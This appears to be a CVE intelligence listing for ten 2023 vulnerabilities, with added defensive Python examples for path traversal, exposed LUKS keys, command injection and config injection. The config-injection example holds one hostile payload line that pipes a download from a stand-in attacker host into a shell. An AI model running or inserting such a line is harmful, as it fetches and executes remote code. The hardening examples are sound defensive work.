Threat and Vulnerability Intelligence Database

CVE-2023-36612

Description: Directory traversal can occur in the Basecamp com.basecamp.bc3 application before 4.2.1 for Android, which may allow an attacker to write arbitrary files in the application's private directory. Additionally, through a malicious intent that uses a custom-crafted deeplink scheme, the attacker may redirect the server's responses (containing sensitive information) to third-party applications.

CVSS: None (0.0, no base score recorded)

EPSS Score: 0.06%

Source: CVE
November 28th, 2024
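
The write side of the traversal above comes down to a containment check that is easy to get wrong. The following is an added example, not Basecamp's code: a generic guard in Python in which naive_write_target shows where an attacker-controlled file name lands once '..' segments resolve, and is_inside_base / safe_attachment_path reject anything that escapes the base directory. The directory path, the attachments subdirectory and the file names are assumed for illustration.

```python
import posixpath

# Assumed layout for this example: an app keeps attachments under a
# subdirectory of its private data directory and names each file after an
# attacker-controllable value (on Android, an intent extra or deeplink
# parameter; here it is just a string).
APP_PRIVATE_DIR = "/data/data/com.example.app/files/attachments"


def naive_write_target(base_dir, name):
    """Where a plain join(base_dir, name) actually lands once the kernel
    resolves '..' segments: the vulnerable pattern, shown for comparison."""
    return posixpath.normpath(posixpath.join(base_dir, name))


def is_inside_base(base_dir, name):
    """True only if base_dir/name resolves to a file strictly below base_dir.

    normpath collapses '.', '..' and repeated slashes lexically, so the check
    works for files that do not exist yet (we are about to write them).
    commonpath is the containment test; a startswith() check on the string
    would wrongly accept a sibling such as '.../attachments_evil/x'.
    """
    if not name or name.startswith("/") or "\x00" in name:
        return False  # an absolute name makes join() discard base_dir
    root = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(root, name))
    return candidate != root and posixpath.commonpath([root, candidate]) == root


def safe_attachment_path(base_dir, name):
    """Return the resolved path, or raise if the name would escape base_dir."""
    if not is_inside_base(base_dir, name):
        raise ValueError("rejected attachment name %r" % name)
    return posixpath.normpath(posixpath.join(base_dir, name))
```

The lexical check is the minimum; in the real application the resolved path should additionally be compared against os.path.realpath of the base directory so that a symlink already present inside it cannot redirect the write.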

CVE-2023-36476

Description: calamares-nixos-extensions provides Calamares branding and modules for NixOS, a GNU/Linux distribution. Users of calamares-nixos-extensions version 0.3.12 and prior who installed NixOS through the graphical Calamares installer with an unencrypted `/boot`, on either non-UEFI systems or with a LUKS partition different from `/`, have their LUKS key file stored in `/boot` as a plaintext CPIO archive attached to their NixOS initrd, so anyone who can read `/boot` can recover the key. A patch is available and is expected to ship in version 0.3.13, backported to the NixOS 22.11, 23.05 and unstable channels. Expert users who have a copy of their data may, as a workaround, re-encrypt the LUKS partition(s) themselves.

CVSS: HIGH (7.9)

EPSS Score: 0.09%

Source: CVE
November 28th, 2024
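
A quick way to confirm whether an installed system is affected is to look inside the initrd in `/boot` for an uncompressed cpio entry carrying the key. The following is an added example, not calamares-nixos-extensions' own code: a minimal parser for the newc cpio format (the format the kernel's initramfs loader accepts, which allows several archives to be concatenated) that lists the entries and flags names that look like key files. build_newc exists only to construct the sample archive for the run, and the name patterns in KEYFILE_RE are assumptions to adjust to what the installer actually wrote.

```python
import re

NEWC_MAGIC = b"070701"
HEADER_LEN = 110          # magic + 13 eight-digit hex fields

# Assumed names for the embedded LUKS key; adjust to what the installer wrote.
KEYFILE_RE = re.compile(r"(^|/)(crypto_keyfile\.bin|[^/]*\.key|keyfile[^/]*)$")


def _align4(n):
    return (n + 3) & ~3


def walk_newc(data):
    """Yield (name, payload) for every file in the newc archives found in
    `data`. The kernel accepts several archives back to back, optionally
    separated by NUL padding, and a compressed section may follow; parsing
    stops at the first bytes that are not a valid header."""
    pos = base = 0
    while True:
        if data[pos:pos + 6] != NEWC_MAGIC:
            pos = data.find(NEWC_MAGIC, pos)
            if pos < 0:
                return
            base = pos
        if pos + HEADER_LEN > len(data):
            return
        hdr = data[pos:pos + HEADER_LEN]
        try:
            # c_ino, c_mode, c_uid, c_gid, c_nlink, c_mtime, c_filesize,
            # c_devmajor, c_devminor, c_rdevmajor, c_rdevminor, c_namesize, c_check
            fields = [int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in range(13)]
        except ValueError:
            pos += 1            # "070701" occurring by chance in compressed data
            continue
        filesize, namesize = fields[6], fields[11]
        name_end = pos + HEADER_LEN + namesize
        name = data[pos + HEADER_LEN:name_end - 1].decode("utf-8", "replace")
        data_start = base + _align4(name_end - base)        # name padded to 4 bytes
        payload = data[data_start:data_start + filesize]
        pos = base + _align4(data_start + filesize - base)  # data padded to 4 bytes
        if name == "TRAILER!!!":
            while pos < len(data) and data[pos] == 0:       # padding between archives
                pos += 1
            base = pos
            continue
        yield name, payload


def find_keyfiles(initrd):
    """Names of non-empty entries whose path looks like a LUKS key file."""
    return [name for name, payload in walk_newc(initrd)
            if payload and KEYFILE_RE.search(name)]


def build_newc(entries):
    """Write a minimal newc archive; used here only to construct sample data."""
    out = bytearray()
    for ino, (name, payload) in enumerate(entries + [("TRAILER!!!", b"")], 1):
        namez = name.encode() + b"\0"
        mode = 0 if name == "TRAILER!!!" else 0o100600
        fields = [ino, mode, 0, 0, 1, 0, len(payload), 0, 0, 0, 0, len(namez), 0]
        out += NEWC_MAGIC + b"".join(b"%08x" % f for f in fields)
        out += namez
        out += b"\0" * (_align4(len(out)) - len(out))
        out += payload
        out += b"\0" * (_align4(len(out)) - len(out))
    return bytes(out)
```

Read the initrd file from `/boot` as bytes and pass it to find_keyfiles. The walker only reads the uncompressed archives and skips the compressed main initrd, which is enough here because the leaked key sits in the plaintext part. Treat any hit as a key that has been exposed; the advisory's remedy is to re-encrypt the LUKS volume, not merely to delete the file.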

CVE-2023-36475

Description: Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 5.5.2 and 6.2.1, an attacker can use a prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. A patch is available in versions 5.5.2 and 6.2.1.

CVSS: CRITICAL (9.8)

EPSS Score: 14.4%

Source: CVE
November 28th, 2024

CVE-2023-36377

Description: A buffer overflow in mtrojnar osslsigncode v2.3 and earlier allows a local attacker to execute arbitrary code via crafted .exe, .sys or .dll files.

CVSS: None (0.0, no base score recorded)

EPSS Score: 0.04%

Source: CVE
November 28th, 2024

CVE-2023-36347

Description: A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.

CVSS: None (0.0, no base score recorded)

EPSS Score: 6.43%

Source: CVE
November 28th, 2024

CVE-2023-36291

Description: A cross-site scripting vulnerability in Maxsite CMS v108.7 allows a remote attacker to inject arbitrary script, executed in the browser of a user who views the affected page, via the f_content parameter in the admin/page_new file.

CVSS: None (0.0, no base score recorded)

EPSS Score: 0.08%

Source: CVE
November 28th, 2024

CVE-2023-36146

Description: A stored cross-site scripting (XSS) vulnerability was found in the Multilaser RE 170 running firmware 2.2.6733.

CVSS: None (0.0, no base score recorded)

EPSS Score: 0.07%

Source: CVE
November 28th, 2024

CVE-2023-36144

Description: An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.

CVSS: None (0.0, no base score recorded)

EPSS Score: 6.89%

Source: CVE
November 28th, 2024

CVE-2023-36143

Description: Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.

CVSS: None (0.0, no base score recorded)

EPSS Score: 0.24%

Source: CVE
November 28th, 2024
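
Diagnostic pages of this kind typically hand a user-supplied host straight to ping or traceroute through a shell. The following is an added example, not Maxprint's firmware (whose internals the entry does not describe): Python that contrasts the string-built command with a validated argv list and, for the case where a shell cannot be avoided, with shlex quoting. The tool name, the -c 4 options and the sample targets are assumed.

```python
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 host name: labels of letters, digits and hyphens, no leading or
# trailing hyphen, 253 characters at most. No shell metacharacter can match.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def unsafe_ping_command(target):
    """Vulnerable pattern: the user's text is spliced into a shell command
    line, so ';', '|', '&', backticks and '$()' are interpreted by the shell."""
    return "ping -c 4 %s" % target


def validate_target(target):
    """Return a canonical IP literal or host name, or raise ValueError."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))   # IPv4 or IPv6 literal
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid diagnostic target: %r" % target)


def is_valid_target(target):
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def safe_ping_argv(target):
    """argv list, no shell: the target is one argument whatever it contains,
    and validation has already excluded option-like values (leading '-')."""
    return ["ping", "-c", "4", validate_target(target)]


def quoted_ping_command(target):
    """If a shell is unavoidable, shlex.quote turns the value into a single
    shell word; validate_target should still run on it first."""
    return "ping -c 4 " + shlex.quote(target)


def run_ping(target, timeout=10):
    """Run the hardened form. Not exercised offline; shown for completeness."""
    proc = subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout
```

The allow-list is the real fix; quoting alone still lets an attacker pick the argument ping receives, which is why safe_ping_argv validates before it builds the list.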

CVE-2023-35932

Description: jcvi is a Python library to facilitate genome assembly, annotation, and comparative genomics. A configuration injection occurs when unsanitized user input reaches the configuration file. A malicious user may craft a payload whose impact depends on how the configuration is consumed; if, for instance, values from the configuration file are executed through a shell, the result is command injection. This vulnerability does not currently have a fix.

CVSS: HIGH (7.1)

EPSS Score: 0.14%

Source: CVE
November 28th, 2024
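
The following is an added, constructed example (not jcvi's code) of the pattern this entry describes: a value supplied by the user is templated into an INI file by hand, a line break inside it adds a key of the attacker's choosing, and a later stage runs that key's value as a command. The [tools] section, the blast_path and pre_run keys and the payload are assumptions for illustration.

```python
import configparser
import io

# Constructed payload: the second line becomes a new key if the value is
# written into the INI file without escaping or validation.
PAYLOAD = "/usr/bin/blastn\npre_run = curl http://attacker.example/x | sh"


def render_config_unsafe(tool_path):
    """Vulnerable pattern: hand-templated INI text. A newline in tool_path
    ends the blast_path line, so the attacker controls the next key."""
    return "[tools]\nblast_path = %s\n" % tool_path


def render_config_library(tool_path):
    """configparser's writer indents embedded newlines as continuation lines,
    so the value stays one value (though it still carries the attacker's text)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp["tools"] = {"blast_path": tool_path}
    buf = io.StringIO()
    cp.write(buf)
    return buf.getvalue()


def is_safe_value(value):
    """Allow-list check for a path-like setting: no control characters, no
    surrounding whitespace, and nothing configparser treats as structure."""
    if not value or value != value.strip():
        return False
    if any(ord(ch) < 32 or ch == "\x7f" for ch in value):
        return False
    return not value.startswith(("[", "#", ";"))


def render_config_safe(tool_path):
    """Validation plus the library writer: the hardened form."""
    if not is_safe_value(tool_path):
        raise ValueError("rejected configuration value %r" % tool_path)
    return render_config_library(tool_path)


def parse_tools_section(config_text):
    """What a later stage of the pipeline sees when it reads the file back."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(config_text)
    return dict(cp["tools"])


def hook_command(config_text):
    """The command a consumer would hand to a shell; None when no hook is set."""
    return parse_tools_section(config_text).get("pre_run")
```

Using the library writer instead of string formatting already stops the payload from becoming a separate key, but the injected text then survives inside blast_path, so the input validation in is_safe_value is still needed before the value is trusted anywhere.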